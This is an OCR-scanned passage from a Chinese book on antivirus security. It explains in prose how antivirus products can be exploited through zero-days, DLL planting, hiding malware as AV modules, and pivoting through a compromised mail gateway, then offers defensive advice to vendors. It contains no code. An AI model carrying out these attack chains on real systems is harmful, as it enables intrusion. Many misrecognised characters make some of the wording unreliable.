当 恶 意 软件 变种 发 布 的 时 候 , 病毒 编写 者 就 知道 反 病 毒 厂 商 在 变种 样本 被 截获 、 分 析 直 到 开发 相 
应 侦 测 〈 或 是 感染 修复 ) 代码 之 前 ， 都 对 新 变种 一 无 所 知 。 不 过 恶意 软件 终归 还 是 会 被 反 病 毒 厂 
商 捕 获 到 的 , 因此 病毒 编写 者 需要 更 新 恶意 软件 来 绕 过 反 病毒 软件 的 侦 测 。 这 时 候 反 病毒 厂商 会 
再 一 次 更 新 病毒 变种 对 应 的 新 特征 码 , 进而 一 次 又 一 次 地 循环 往复 。 这 就 是 我 们 听 说 的 软件 安全 
行业 臭名 昭著 的 猫 鼠 对 抗 攻防 游戏 。 对 计算 机 用 户 来 说 不 幸 的 是 ， 不管 反 病毒 三 商 再 怎么 追赶 ， 
都 赶不上 恶意 软件 作者 开发 变种 的 脚步 。 

在 之 前 的 例子 中 , 我 们 主要 探讨 的 是 影响 广泛 的 恶意 软件 。 针 对 特定 目标 的 恶意 软件 在 整个 
感染 执行 过 程 中 悄 无 声息 ， 当 达到 相关 目的 后 ， 会 删除 自身 ， 没 有 任何 人 会 注意 到 。 

此 外 , 用 户 还 需要 知道 反 病毒 产品 和 其 他 软件 一 样 可 以 被 攻破 , 其 使 用 的 安全 策略 相 比 办 公 
软件 套装 和 浏览 器 ( 如 Microsoft Office 和 Google Chrome ) 会 更 薄弱 一 些 。 这 就 意味 着 我 们 现在 使 
用 的 反 病 毒 软 件 事 实 上 是 在 为 攻击 者 开启 方便 之 门 。 比 如 , 恶意 软件 可 以 利用 文件 格式 解析 器 中 
的 漏洞 进行 攻击 利用 。 反 病毒 软件 中 为 防止 其 自身 漏洞 被 攻击 利用 而 采取 的 相关 措施 , 很 多 时 候 
要 么 十 分 薄弱 ,要么 就 根本 不 存在 。 比 如 ， 有 一 些 反 病毒 软件 的 “自我 保护 ”机 制 ， 就 是 防止 针 
对 其 自身 相关 进程 调用 ZzwrerminateProcess。 

考虑 以 下 反 病 毒 软件 被 攻破 并 执行 恶意 行为 的 场景 。 这 是 一 个 假设 的 场景 , 却 很 有 可 能 真实 
发 生 。 

Q) 恶意 软件 在 目标 用 户 电 脑 上 执行 。 

(2) 恶意 软件 使 用 一 个 零 日 漏洞 禁用 了 反 病 毒 软件 的 防护 。 要 实现 这 一 目的 ， 一 个 空 指针 引 
用 漏洞 造成 的 反 病 毒 软件 防护 服务 DoS 漏 洞 就 够 了 。 

(3) 当 反 病毒 软件 还 在 通过 重启 恢复 崩 演 的 服务 时 , 恶意 软件 感染 了 反 病 毒 程序 的 相关 模块 。 
比如 ,恶意 软件 从 网 上 将 一 个 动态 链接 库 下 载 到 反 病毒 软 件 的 程序 路 径 下 , 之 后 该 动态 链接 库 会 
被 反 病 毒 软件 的 用 户 态 模块 调用 。 

(4) 恶意 软件 在 进行 相关 操作 后 ， 如 果 需 要 会 重启 反 病 毒 程序 。 

(5) 这 样 恶意 软件 就 运行 在 反 病 毒 软件 的 执行 环境 下 了 。 

让 我 们 再 来 看 一 个 更 有 可 能 发 生 且 危害 性 更 大 的 攻击 场景 。 

(1) 一 个 漏洞 攻击 利用 程序 在 受害 者 电脑 上 运行 。 比 如 ， 这 个 漏洞 利用 攻击 程序 可 能 是 一 个 
利用 了 浏览 需 漏 洞 的 恶意 程序 ， 接 着 它 会 下 载 并 运行 一 些 恶 意 程序 。 

Q) 恶意 软件 使 用 反 病 毒 程序 中 的 零 日 漏洞 ， 来 实现 在 反 病 毒 软 件 的 执行 环境 下 运行 〈 可 能 
是 Windows 平 台 下 的 SYSTEM 权 限 执行 或 是 类 Unix 平 台 下 的 root 权 限 执行 ), 这 样 就 可 以 绕 过 浏览 
器 或 文档 阅读 器 的 沙 盒 了 。 

(3) 现在 恶意 软件 已 经 成 功 提升 权限 并 绕 过 了 沙 盒 ( 反 病 毒 产 品 经 常 不 在 沙 盒 内 运行 )。 反 病 
毒 软 件 可 以 通过 感染 反 病 毒 软 件 , 并 在 反 病 毒 软件 的 执行 环境 下 创建 相关 线程 , 来 悄 无 声息 地 在 
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电脑 上 长 期 驻 留 执行 。 

(4) 恶意 软件 现在 就 成 功 在 一 个 高 权限 应 用 执行 环境 下 运行 了 : 这 个 应 用 就 是 反 病 毒 软件 。 

在 上 述 两 个 场景 中 , 反 病 毒 软 件 是 否 检查 过 自身 相关 文件 或 进程 的 真实 合法 性 呢 ? 这 个 问题 
听 起 来 好 像 没 什么 意义 ， 毕 竟 反 病毒 软件 怎么 能 不 相信 自己 呢 ? 

同一 方法 有 如 下 不 同 的 变化 。 

口 恶意 软件 可 以 通过 零 日 漏洞 在 以 SYSTEM 权 限 运行 的 反 病 毒 软件 下 创建 相关 线程 ， 同 时 

作为 单一 恶意 软件 在 独立 线程 之 间 通 信 。 反 病毒 软件 在 扫描 过程 中 会 将 自身 程序 排除 掉 ， 
这 样 恶意 软件 就 无 法 被 侦 测 到 了 。 

口 恶意 软件 可 以 隐藏 成 反 病 毒 软 件 的 一 个 模块 。 比 如 ， 在 Unix 系 统 下 可 以 是 反 病 毒 软 件 的 

更 新 文件 或 脚本 ， 如 一 个 任务 脚本 。 因 为 反 病毒 软件 会 认为 该 任务 脚本 是 自身 模块 ， 所 

以 在 扫描 的 过 程 中 会 将 其 排除 。 
恶意 软件 可 以 通过 无 数 方法 借助 反 病 毒 软件 来 隐藏 自身 。 可 以 认为 这 种 隐身 技术 是 一 种 反 病 
毒 软件 层面 的 Rootkit。 这 类 Rootkit 可 以 接触 到 反 病毒 软件 的 所 有 资源 , 这 在 理论 上 意味 着 Rootkit 
可 以 做 任何 事 ， 因 为 它 是 在 反 病 毒 软件 的 上 下 文中 执行 的 。 此 外 ， 对 反 病 毒 软件 来 说 , 侦 测 此 类 
Rootkit 会 异常 困难 : 因为 这 需要 反 病 毒 软件 放弃 对 自身 文件 和 进程 的 信任 。 

不 过 要 指出 的 是 , 到 目前 为 止 我 偶遇 过 几 个 此 类 案例 。 在 一 个 案例 中 ，Metasploit meterpreter 
的 恶意 代码 感染 了 由 于 某 种 原因 没有 被 保护 的 反 病毒 软件 进程 ( 创建 线程 来 在 进程 之 间 切 换 )。 
在 另 一 个 案例 中 , 恶意 代码 隐藏 在 了 恶意 软件 在 以 当前 用 户 运行 且 不 受 保 护 的 应 用 环境 下 注 和 人 的 
一 个 线程 中 。 尽 管 在 相关 研究 过 程 中 , 类似 攻击 手法 并 不 常见 , 但 这 并 不 意味 着 不 会 有 恶意 软件 
使 用 类 似 的 “隐身 ”技术 。 事 实 上 ， 很 多 高 质量 的 恶意 软件 会 用 到 相关 高 级 “隐身 ”技术 。 这 一 
块 技术 目前 还 没有 被 恶意 软件 编写 者 研究 透彻 。 安 全 研究 员 首 先 发 现 此 类 技术 的 情况 少 之 又 少 ， 
只 是 向 公众 首次 公开 此 类 技术 罢了 。 

总 的 来 说 , 永远 不 要 盲目 相信 我 们 安装 的 反 病 毒 软件 。 反 病毒 软件 可 以 被 攻破 , 被 用 来 隐藏 
恶意 软件 或 恶意 软件 进程 /线程 。 同 时 还 要 强调 的 是 ， 盲 目 相 信 反 病毒 软件 对 公司 组 织 来 说 也 是 
一 个 严重 的 错误 。 















































































































































不 依赖 于 零 日 漏洞 的 恶意 软件 攻击 


本 节 使 用 一 些 不 借助 零 日 漏洞 的 场景 , 来 解释 不 要 盲目 信任 反 病 毒 软件 的 原因 。 假设 一 个 
感染 性 文件 感染 了 计算 机 。 所 有 试图 扫描 或 执行 被 感染 文件 的 程序 ,都 会 被 病毒 感染 。 身 名 了 昭 
著 的 Sality 和 Virut 病 毒 就 是 这 样 的 例子 。 因 此 ， 我们 有 什么 理由 去 相信 ， 同 为 普通 程序 的 反 病 
毒 扫 描 器 在 扫描 和 修复 感染 过 程 中 不 会 被 病毒 感染 呢 ? 即使 反 病 毒 扫 描 器 有 自我 保护 机 制 ,在 
不 被 感染 的 情况 下 扫描 完成 了 整个 电脑 的 文件 ( 对 独立 的 命令 行 扫描 器 来 说 , 这 种 情况 不 太 可 
能 ), 但 是 计算 机 中 的 其 他 可 执行 程序 还 是 处 于 被 病毒 感染 的 状态 。( 当然 , 被 感染 的 文件 是 否 
能 修复 ， 还 要 看 反 病 毒 软件 的 感染 修复 模块 的 好 坏 。) 

高 级 的 文件 感染 型 病毒 在 每 一 次 感染 过 程 中 会 使 用 不 同 的 感染 方式 。 如 果 我 们 去 问 问 反 病 
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毒 支 持 工 程 师 , 会 发 现 这 是 相当 常见 的 情况 。 但是， 对 策 也 很 简单 : 将 扫描 器 和 病毒 数据 库 文 
件 复制 到 CD-ROM 中 ， 接 着 在 CD-ROM 中 执行 反 病 毒 程序 。 因 为 CD 是 只 读 媒 介 ， 所 以 文件 感 
染 型 病毒 无 法 感染 它 。 问 题 就 这 么 解决 了 。 


17.1.2 ”隔离 机 器 来 增强 防护 


对 于 大 型 组 织 机 构 来 说 ， 如 果 可 能 的 话 , 我 建议 隔离 有 反 病 毒 软 件 进行 网 络 分 析 的 机 器 。 因 
为 反 病 毒 软件 可 以 用 来 作为 渗透 内 网 的 入 口 点 ， 也 可 以 用 来 作为 切 人 其 他 组 织 内 网 的 跳板 之 一 ， 
使 攻击 者 可 以 攻破 网 络 分 析 安 全 产品 。 

下 面 举 一 个 简单 却 又 十 分 严重 的 例子 , 来 证 明 一 款 不 那么 好 的 反 病 毒 软 件 对 于 一 个 组 织 机 构 
来 说 有 多 么 危险 。 

(1) 目标 组 织 机 构 进行 了 内 网 边界 隔离 保护 ， 只 有 电子 邮件 和 Web 服 务 器 有 与 外 界 交 互 的 接 
口 ， 同 时 安装 了 所 有 最 新 的 补丁 。 

(2) Web 或 电子 邮件 服务 器 会 扫描 所 有 接收 到 的 文件 。 

(3) Web 或 电子 邮件 服务 需 拦 截 到 的 文件 之 一 ， 事 实 上 是 一 个 针对 组 织 机 构 目 前 所 使 用 反 病 
毒 软 件 的 零 日 漏洞 。 通 过 该 漏洞 利用 攻击 程序 ， 电 子 邮件 网 关 或 Web 服 务 器 被 攻破 。 

(4) 讽刺 的 是 ， 攻 击 者 借助 组 织 内 使 用 的 反 病 毒 产品 ， 成 功 渗透 进入 目标 组 织 内 网 。 

(5) 如 果 反 病毒 软件 针对 内 网 的 其 他 机 器 进行 网 络 分 析 ， 攻 击 者 可 以 借助 已 经 被 攻破 的 邮件 
网 关 或 Web 服 务 器 ， 通 过 HTTP、SMB/CIFS 或 其 他 协议 向 内 网 的 其 他 机 器 发 送 恶 意 文件 ， 来 进 一 
步 渗透 内 网 。 

(6) 如 果 内 网 中 的 计算 机 使 用 了 同样 的 反 病 毒 产 品 ， 只 要 被 攻破 的 内 网 机 器 可 以 通过 网 络 接 
触 到 相关 计算 机 上 安装 的 反 病 毒 产 品 , 并 进行 网 络 分 析 , 就 可 以 用 同样 的 零 日 漏洞 利用 程序 攻破 
整个 计算 机 。 

总 结 : 针对 某 一 组 织 机 构 内 使 用 的 反 病 毒 产 品 ,使 用 一 个 或 两 个 零 日 漏洞 利用 攻击 程序 ， 就 
可 以 攻破 整个 组 织 。 想 象 一 下 ,一 个 蠕虫 漏洞 利用 攻击 程序 ,利用 了 一 个 我 们 最 喜爱 的 反 病 毒 程 
序 中 的 零 日 漏洞 。 尽 管 目前 没有 针对 反 病 毒 程序 攻击 的 蠕虫 病毒 , 但 是 开发 出 这 样 的 病毒 是 绝对 
可 能 的 。 

上 述 场景 不 仅 适 用 于 文件 分 析 工 具 ( 例如 ， 常 见 的 反 病 毒 软件 个 人 扣 面 版 )， 也 适用 于 网 络 
分 析 工 具 ( 比如 ,分析 计算 机 上 所 有 网 络 流量 的 工具 )。 如 果 目 标 机 器 上 有 网 络 分 析 工 具 ， 那 么 
远程 攻击 面 会 变 得 很 大 ， 因 为 这 类 工具 需要 处 理 类 似 HTTP、CDP、Oracle TNS、SMB/CIFS 等 其 
他 一 系列 协议 。 如 果 文 件 格 式 解析 器 中 存在 漏洞 的 可 能 性 很 高 , 在 实现 网 络 流量 分 析 的 相关 代码 
中 存在 漏洞 的 可 能 性 会 更 高 。 考 虑 到 上 述 两 个 模块 暴露 的 攻击 面 , 现在 你 一 定 会 对 之 前 从 未 审计 
过 的 反 病 毒 产 品 抱 剑 疑 态 度 了 。 
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17.1.3 ”审计 反 病 毒 产品 


强烈 建议 对 组 织 内 准备 部 署 或 已 经 部 署 的 反 病 毒 产品 进行 审计 。 不 经 过 自己 或 第 三 方 的 审 
ib. 你 永远 也 无 法 了 解 目前 使 用 的 反 病毒 产品 的 质量 、 反 病毒 产品 对 外 暴露 的 攻击 面 及 其 自我 保 
护 等 级 。 要 记 住 ， 永 远 不 要 相信 出 于 增加 产品 销量 的 反 病 毒 产品 营销 广告 。 

尽管 许多 大 公司 ( 比如 Microsoft、Google、IBM 和 Oracle ) 的 反 病 毒 产 品 的 代码 经 常会 被 第 
三 方 审计 ,但 是 还 有 很 多 反 病 毒 产品 从 来 没有 被 审计 过 。 对 ， 就 是 这 样 ， 从 来 没有 被 审计 过 。 原 
因 是 , 这 类 反 病 毒 厂 商 不 想 将 源 代码 提供 给 第 三 方 审计 。 第 三 方 审计 员 需 要 连接 到 这 类 厂商 总 部 
的 机 器 ， 在 反 病毒 厂商 员工 的 监督 下 ,对 相关 代码 进行 审计 。 反 病毒 厂商 最 起 码 要 对 其 产品 进行 
黑 盒 审计 。 不 过 不 幸 的 是 ， 大 多 数 反 病毒 厂商 在 开发 过 程 中 ， 从 来 没有 审计 这 一 环节 。 当 然 也 有 
例外 ， 一 些 反 病 毒 产 品 会 进行 以 下 方式 的 审计 : 
口 常规 黑 盒 审计 ; 
OQ 第 规 、 内 部 源 代码 审计 ; 
口 第 三 方 源 代码 审计 。 
以 我 的 经 验 来 说 ， 没 有 经 过 审计 的 反 病 毒 产品 漏洞 百出 。 不 信 的 话 ， 可 以 自己 动手 试 试 。 


17.2 ”给 反 病 毒 厂商 的 建议 


在 两 年 时 间 内 ， 我 审计 了 许多 反 病 毒 产 品 。 结 果 在 17 款 反 病 毒 软件 中 ， 有 14 款 发 现 了 漏洞 。 
一 般 来 说 ， 我 发 现 漏 洞 以 后 ， 会 尝试 利用 漏洞 ， 最 起 码 会 查看 漏洞 是 否 能 够 被 利用 。 

此 外 , 我 发 现 很 多 反 病 毒 产品 没有 采取 权限 隔离 、 沙 盒 保 护 、 反 漏洞 攻击 利用 等 防护 。 这 就 
导致 ， 相 比 利 用 Google Chrome 或 Microsoft Word 这 类 采取 了 一 流 防 护 措施 来 为 攻击 者 利用 其 漏洞 
设置 障碍 的 产品 来 说 ， 利 用 反 病 毒 产品 的 漏洞 进行 攻击 十 分 轻松 。 

接 下 来 的 内 容 将 为 反 病 毒 广 商 提供 一 些 建议 。 部 分 建议 汲取 自 类 似 Adobe Acrobat Reader, 
Microsoft Word 和 多 数 浏览 名， 以 此 来 为 反 病 毒 产 品 指明 方向 。 


17.2.1 优秀 的 工程 师 并 不 代表 安全 


反 病 毒 厂 商会 招募 优秀 的 工程 师 来 开发 产品 , 同时 还 会 招募 优秀 的 程序 员 、 分 析 师 和 数据 库 、 
系统 以 及 网 络 管理 员 。 但 是 ， 反 病毒 厂商 也 需要 安全 专家 。 一 位 拥有 多 年 C 或 C++ 开发 经 验 的 反 
病毒 工程 师 ,， 在 开发 过 程 中 可 能 会 缺乏 安全 意识 ， 或 是 不 知道 如 何 挖掘 并 利用 漏洞 。 的 确 ， 有 些 
工程 师 对 什么 是 安全 的 代码 一 无 所 知 ， 无 论 他 是 否 为 反 病 毒 厂商 工作 。 

这 一 问题 可 以 通过 招聘 安全 工程 师 并 进行 相关 培训 来 解决 。 培训 程序 员 的 安全 开发 意识 以 及 
漏洞 发 现 和 利用 能 力 , 可 以 让 他 们 清楚 地 意识 到 自己 所 开发 反 病毒 软件 中 的 相关 漏洞 , 并 在 开发 
过 程 中 将 漏洞 修复 。 此 外 ， 有 了 相关 安全 开发 知识 ,工程 师 在 开发 过 程 中 会 自动 放弃 使 用 不 安全 
的 代码 编写 模式 。 组织 内 如 果 不 进行 安全 意识 教育 , 会 导致 工程 师 在 开发 过 程 中 缺失 对 安全 因素 
的 考虑 ， 从 而 写 出 不 安全 的 代码 或 作出 缺少 安全 性 考虑 的 程序 设计 选择 。 
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17.2.2 ”利用 反 病 毒 软件 的 漏洞 很 简单 


令 人 遗憾 的 是 , 除了 少数 例外 ,一些 比较 知名 的 反 病 毒 软件 都 没有 使 用 以 下 在 浏览 偶 和 文本 

阅读 器 中 常见 的 反 漏洞 利用 技术 : 

a 权限 隔离 ; 

a 沙 盒 隔离 ; 

口 模拟 ; 

口 默认 情况 下 不 信任 其 他 组 件 ; 

口 不 仅 针对 第 三 方 应 用 使 用 反 漏 洞 利用 防护 ， 同 时 对 反 病 毒 软 件 自身 应 用 相关 防护 。 

大 多 数 反 病 毒 软 件 有 一 个 高 权限 (本 地 系统 或 root 权 限 ) 执行 的 恶意 软件 分 析 服 务 (文件 和 
网 络 流量 分 析 ) 以 及 一 个 用 于 展示 结果 的 GUI 应 用 (一般 没有 和 多少 权限 )。 当 恶意 构造 的 网 络 流 
量 包 或 文件 被 反 病 毒 扫 描 器 截取 后 , 恶意 软件 就 可 以 通过 其 内 部 漏洞 攻破 反 病 毒 软件 , 同时 获取 
系统 最 高 权限 ( Windows 系 统 中 的 本 地 系统 权限 或 类 Unix 系 统 中 的 root 权 限 )。 

与 此 同时 , 一 些 文档 阅读 应 用 或 浏览 器 会 使 用 更 复杂 的 权限 隔离 。 通 常 来 说 ,在 文档 阅读 屁 
或 浏览 器 中 ,有 一 个 进程 会 拥有 当前 登录 用 户 权 限 ,其 他 一 些 worker 进 程 拥有 执行 解析 和 泻 染 PDF 
文件 、Word 文 档 或 Web 页 面 的 权限 。 如 果 要 利用 此 类 应 用 中 的 漏洞 , 漏洞 利用 攻击 脚本 首先 需要 
绕 过 沙 盒 执行 代码 来 获取 更 高 的 权限 。 在 众多 反 病 毒 软件 中 ,只 有 很 小 的 一 部 分 反 病 毒 软件 会 采 
取 相 同 的 措施 。 这 种 情况 应 当 改 变 , 因为 一 款 安全 类 产品 竟然 比 一 款 文 档 阅读 器 更 没有 安全 意识 ， 
这 是 多 么 大 的 讽刺 呀 ! 









































17.2.3 ”进行 审计 


强烈 建议 反 病毒 三 商定 期 审计 其 相关 产品 。 如 果 不 进行 审计 ,就 不 可 能 做 出 一 款 安全 的 产品 。 

下 面 介 绍 一 些 可 采取 的 审计 策略 。 

口 内 部 审计 每 当 新 模块 或 新 功能 被 加 入 到 反 病 毒 软件 中 ， 都 需要 进行 此 类 审计 。 

口 第 三 方 源 代码 审计 这 是 最 佳 的 应 用 安全 性 审计 方式 。 第 三 方 审计 可 以 克服 内 部 审计 过 
程 中 的 盲区 。 第 三 方 审计 会 实事 求 是 地 分 析 产 品 的 所 有 模块 ， 并 重点 分 析 高 危 模 块 。 在 
内 部 审计 过 程 中 ， 如 果 审 计 工 程 师 发 现 一 段 代码 多 年 来 一 直 正 常 无 误 地 运行 ， 就 会 认为 
该 代码 没有 漏洞 ， 从 而 将 其 忽略 。 

口 第 三 方 黑 盒 审计 ”此 类 审计 的 效果 介 于 内 部 审计 和 第 三 方 源 代 码 审计 之 间 。 审 计 方 可 以 

通过 黑 盒 审 计 的 方式 ， 挖 掘 产品 中 的 漏洞 ， 进 而 降低 源 代 码 泄 漏 的 可 能 性 。 

只 要 遵循 审计 工程 师 推 荐 的 改进 方式 ,同时 及 时 修复 审计 过 程 中 发 现 的 漏洞 , 定期 审计 可 以 

使 反 病 毒 软件 变 得 更 安全 。 
























































17.2.4 ”模糊 测试 
正如 本 书 第 13 章 探讨 的 那样 , 模糊 测试 是 一 种 挖掘 产品 中 漏洞 的 黑 盒 测试 手段 。 强 烈 建议 在 
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开发 过 程 中 持续 对 产品 进行 模糊 测试 ， 以 此 来 挖掘 和 修复 产品 中 的 漏洞 。 在 开发 过 程 中 , 开发 者 
可 以 使 用 模糊 测试 来 测试 新 功能 。QA 团 队 在 提供 产品 正式 版 本 下 载 之 前 ， 也 可 以 对 最 终 编 译 的 
程序 进行 模糊 测试 。 但 是 , 对 于 已 经 发 布 的 程序 ， 也 应 该 使 用 模糊 测试 来 挖掘 其 中 的 漏洞 ， 因 为 
有 一 些 漏洞 需要 一 周 甚至 是 数 月 的 模糊 测试 才能 发 现 。 

模糊 测试 效果 好 ， 可 以 暴露 出 程序 中 显而易见 的 安全 漏洞 ， 帮 助 挖掘 程序 中 更 复杂 的 漏洞 ， 
而 且 成 本 很 低 。 即 便 是 在 一 台 计 算 机 上 使 用 radamasa 模 拟 器 并 用 扫描 器 扫描 生成 的 模糊 测试 畸 
形 文件 也 会 有 效 。 但 是 ， 针 对 产品 定制 更 为 复杂 的 模糊 测试 工具 ， 效 果 显然 会 更 好 。 


17.2.5 ”安全 地 使 用 权限 


大 部 分 反 病 毒 软件 通常 会 以 可 能 的 最 高 权限 ( 本 地 系统 或 root 权 限 ) 来 运行 进程 ， 却 没有 像 
浏览 器 、 办 公 软 件 或 文档 阅读 器 那样 ， 使 用 沙 盒 或 其 他 隔离 运行 措施 。 目 前 没有 一 款 反 病毒 软件 
采用 给 漏洞 设置 利用 门槛 的 技术 ， 类 似 隔 离 堆 或 最 新 版 本 Internet Explorer 中 加 入 的 Delay Frees 
(最 起 码 ， 我 在 两 年 间 研 究 的 17 款 反 病 毒 软件 都 没有 使 用 。) 

如 果 反 病 毒 软 件 想 要 进步 ， 想 要 写 出 高 质量 的 反 病 毒 软件 而 不 是 带 有 大 写 SAFE 标 签 的 可 爱 
GUI 应 用 程序 ， 就 必须 遵循 像 浏览 器 、 文 档 阅 读 器 这 样 的 流行 客户 端 软件 几 年 之 前 使 用 的 相关 技 
术 。 最 起 码 ， 反 病毒 软件 需要 进行 权限 隔离 并 引入 沙 盒 隔离 机 制 。 

一 些 反 病毒 广 商 也 许 会 争辩 说 反 病 毒 服务 必须 以 高 权限 执行 。 这 种 说 法 确实 有 道理 : 一 个 
mini-filter 驱 动 需 要 拦截 网 络 流 量 ; 一 个 应 用 必须 具有 相关 权限 才能 读 写 硬 盘 甚 至 是 MBR ( master 
boot record ) 上 的 所 有 文件 。 但 是 ， 具 有 权限 的 应 用 的 唯一 目的 应 该 是 读 取 文 件 或 网 络 流量 包 。 
接着 将 读 取 到 的 信息 发 送 给 权限 较 低 的 应 用 去 处 理 , 该 低 权限 应 用 有 可 能 会 因为 网 络 协议 解析 模 
块 或 文件 格式 解析 模块 中 的 漏洞 ， 执 行 潜在 的 恶意 代码 。 不 过 这 样 一 来 ,攻击 者 就 需要 至 少 利 用 
两 个 漏洞 ， 才 能 攻击 反 病 毒 软件 ， 执 行 任意 代码 : 

口 首先 利用 通过 低 权 限 模块 进行 的 文件 或 网 络 流量 包 解析 模块 中 的 漏洞 ; 
a 接着 利用 一 个 沙 盒 绕 过 漏洞 ， 进 而 攻破 相关 软件 。 

此 外 , 洪 在 的 不 安全 代码 需要 被 放 和 人 虚拟 或 沙 盒 环 境 中 运行 。 比 如 ,证 程序 在 模拟 器 或 虚拟 
机 中 执行 ， 而 不 是 直接 本 机 执行 。 这 样 一 来 ， 如 果 要 利用 反 病 毒 软 件 的 漏洞 执行 任意 代码 ， 就 需 
要 一 个 可 以 从 虚拟 机 或 沙 盒 逃逸 的 漏洞 。 这 就 会 给 利用 反 病毒 软件 的 漏洞 设置 很 高 的 门槛 。 


17.2.6 减少 解析 器 中 的 危险 代码 


反 病 毒 软件 中 负责 文件 和 网 络 流量 解析 的 模块 因为 会 处 理 恶 意 代 码 ， 所 以 时 时 处 于 危险 境 
地 。 在 编写 这 类 模块 的 时 候 必须 慎之 又 愤 ， 否 则 将 会 给 攻击 者 淫 开 大 门 。 此外， 正如 前 面 所 提 到 
的 ， 这 类 解析 器 的 代码 必须 要 运行 在 沙 盒 环境 中 ， 因 为 使 用 C 或 C+ 编写 的 反 病 毒 引擎 出 现 可 用 
漏洞 的 概率 很 高 。 因 此 ， 在 开发 过 程 中 ， 不 要 使 用 C 或 C++ 编写 所 有 程序 模块 ， 可 以 采取 本 机 语 
言 与 内 存 安全 语言 结合 的 方式 ， 这 样 可 以 有 效 降低 代码 存在 缺陷 时 带 来 的 危害 。 
比如 , 反 病 毒 软件 中 用 于 实现 实时 防护 功能 的 内 核 文件 分 析 过 滤 驱动 不 需要 包括 文件 格式 或 
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协议 解析 器 的 代码 。 驱 动 可 以 与 低 权限 的 托管 进程 (服务 ) 通信 ， 接 收 该 进程 返回 的 文件 格式 解 
析 结 果 。 

可 以 用 类 似 .NET、Lua、Perl、Python、Ruby 和 Java 这 样 的 托管 ( 内 存 安 全 ) 或 脚本 语言 
编写 病毒 扫描 和 文件 修复 程序 ， 还 可 以 编写 文件 格式 和 网 络 协议 解析 需 。 这 样 一 来 ， 出 现 能 被 
远程 利用 的 漏洞 的 可 能 性 会 大 大 降低 。 此 外 ,这 类 语言 的 运行 性 能 与 C 或 C++ 之 间 的 差异 正在 逐 
年 缩小 。 

事实 上 ， 已 经 有 一 些 反 病 毒 软 件 正 在 使 用 NET 和 Lua 进 行 开发 了 。 对 于 漏洞 挖掘 者 来 说 ， 使 
用 内 存 安 全 语言 与 使 用 本 机 语言 编写 的 程序 之 间 有 很 大 的 区 别 , 因为 在 使 用 这 类 内 存 安全 语言 5 
写 的 程序 中 ， 存 在 可 以 远程 利用 的 漏洞 的 可 能 性 很 小 ， 所 以 在 这 类 程序 中 发 现 漏洞 也 相对 困难 。 


17.2.7 ”改进 升级 服务 和 协议 的 安全 性 


许多 反 病 毒 软件 在 下 载 文件 过 程 中 没有 使 用 SSL 或 TLS 加 密 ， 这 就 意味 着 攻击 者 可 以 截取 修 
改 未 加 密 通信 渠道 中 的 信息 。 对 反 病 毒 软件 更 新 服务 最 起 码 的 要 求 是 ， 下 载 过 程 中 必须 使 用 TLS 
加 密 的 传输 渠道 : 无 论 是 下 载 程序 ， 还 是 恶意 软件 特征 数据 库 文 件 。 

正确 实现 更 新 系统 的 参考 范例 是 Microsoft Windows 更 新 服务 。 除 了 更 新 下 载 程序 文件 ， 
Windows 系 统 对 所 有 更 新 协议 使 用 了 TLS ( HITPS )。 尽 管 下 载 程序 文件 过 程 中 没有 使 用 HTTPS 
传输 ， 看 起 来 不 是 很 安全 。 但 是 ，Windows 更 新 服务 每 一 个 下 载 的 cabinet 文 件 ( .cab ) 或 可 执行 
程序 ， 在 传输 过 程 中 都 会 经 过 更 新 程序 的 签名 和 校 验 。 
Windows 安 全 良好 的 更 新 服务 给 了 我 们 另 一 个 启发 : 更 新 服务 下 载 的 所 有 文件 在 运行 之 前 必 
须 签名 和 校 验 。 你 可 能 会 惊讶 地 发 现 反 病毒 安全 套装 的 病毒 数据 库 文 件 , 甚至 是 其 程序 模块 文件 
(尤其 是 一 些 反 病毒 软件 的 Unix 版 本 中 ) 都 没有 签名 措施 ， 这 些 安全 套装 只 是 简单 地 使 用 MD5、 
SHA1 或 CRC32 来 校 验 更 新 文件 在 传输 过 程 中 的 正确 性 。 类 似 措 施 确实 考虑 到 了 更 新 文件 在 传输 
过 程 中 可 能 会 受到 破坏 , 但 是 没有 考虑 到 校 验 更 新 文件 的 完整 性 和 源头 。 使 用 RSA 算 法 对 下 载 的 
更 新 文件 或 对 应 的 散 列 值 来 进行 签名 十 分 安全 , 因为 这 样 不 仅 能 验证 下 载 更 新 文件 的 完整 性 ,还 
能 对 已 下 载 文件 的 真实 性 进行 校 验 ( 可 以 校 验 文件 的 签名 是 否 正确 、 文 件 是 否 已 经 损坏 、 文 件 是 
否 在 传输 过 程 中 被 攻击 者 修改 )。 如 果 签 名 校 验 正 确 ， 就 可 以 保证 从 服务 器 端 下 载 的 更 新 文件 完 
整 是 没有 被 算 改 过 。 


17.2.8 删除 或 禁用 旧 代 码 


在 支持 MS-DOS 时 代 的 可 执行 程序 封装 器 、 病 毒 、 安 病毒 和 针对 Office 97 的 反 病 毒 软件 中 ， 
旧 代 码 数量 庞大 。 自 然 , 反 病 毒 厂 商 越 老牌 ， 其 发 病毒 产品 中 已 经 废弃 过 时 的 代码 也 就 越 多 。 要 
知道 这 些 旧 代码 是 在 十 分 久远 的 时 候 编写 的 ,因为 那 时 候 没 有 相关 必要 , 所 以 在 开发 过 程 中 没有 
人 有 相关 安全 意识 。 对 于 攻击 者 来 说 ,这 些 十 多 年 以 前 的 代码 很 有 可 能 存在 漏洞 。 这 类 代码 虽然 
已 经 基本 上 无 效 了 ,但 是 还 是 能 从 中 找 出 漏洞 。 比 如 ， 我 曾经 在 用 于 查 杀 29A 团 队 制 造 的 Zmist 
病毒 的 代码 中 找到 过 漏洞 ,相关 代码 会 处 理 十 分 老 旧 的 可 执行 程序 封装 器 。 对 于 反 病 毒 软件 的 开 













































































































































































发 者 ， 有 以 下 建议 。 
口 删除 目前 已 经 没有 任何 作用 的 代码 。 现在 几乎 大 部 分 Windows 系 统 都 已 经 是 64 位 的 了 , 16 
位 的 程序 代码 已 经 没有 任何 作用 了 , 所 以 保留 针对 旧 MS-DOS 病 毒 或 16 位 的 Windows 系 统 
下 的 病毒 的 侦 测 又 有 什么 用 呢 ? 
O 使 旧 代 码 和 侦 测 程序 可 选 。 在 反 病毒 软件 安装 过 程 中 ， 可 以 让 用 户 在 安装 程序 中 选择 是 
否 启用 旧 的 侦 测 程序 。 

上 述 两 条 建议 可 以 帮助 减少 反 病 毒 软件 中 的 漏洞 。 总 的 来 说 ,代码 越 少 ( 那些 如 今 已 经 不 起 
作用 的 代码 ) 就 意味 着 出 现 漏洞 的 可 能 性 越 小 。 
不 过 从 男 一 方面 来 讲 , 删 减 此 类 代码 会 影响 反 病毒 产品 在 一 些 反 病毒 软件 测评 中 的 成 绩 。 一 
